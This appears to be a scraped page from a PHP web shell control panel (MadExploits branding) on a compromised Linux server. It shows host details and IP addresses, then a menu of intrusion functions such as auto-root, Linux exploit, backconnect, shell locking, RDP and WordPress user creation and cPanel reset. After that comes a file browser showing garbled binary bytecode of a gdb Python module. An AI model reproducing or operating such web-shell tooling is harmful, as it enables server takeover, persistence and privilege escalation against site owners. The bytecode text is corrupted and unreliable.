Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
gdb /
python /
gdb /
function /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
139
B
-rw-r--r--
as_string.cpython-310.pyc
846
B
-rw-r--r--
caller_is.cpython-310.pyc
4.41
KB
-rw-r--r--
strfns.cpython-310.pyc
2.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : strfns.cpython-310.pyc
o ̴6b+ � @ sx d Z ddlZddlZG dd� dej�ZG dd� dej�ZG dd� dej�ZG d d � d ej�Ze� e� e� e� dS )z#$_memeq, $_strlen, $_streq, $_regex� Nc �( e Zd ZdZ� fdd�Zdd� Z� ZS )�_MemEqz�$_memeq - compare bytes of memory. Usage: $_memeq (A, B, LEN) Returns: True if LEN bytes at A and B compare equally.c � t t| ��d� d S )N�_memeq)�superr �__init__��self�� __class__� �,/usr/share/gdb/python/gdb/function/strfns.pyr � z_MemEq.__init__c C s\ |dk rt d��|dkrdS t�d��|d �}|�� }|�|�}|�|�}|�� |�� kS )Nr zlength must be non-negativeT�char� )� ValueError�gdb�lookup_type�vector�pointer�reinterpret_cast�dereference)r �a�b�length�byte_vector�ptr_byte_vector�a_ptr�b_ptrr r r �invoke"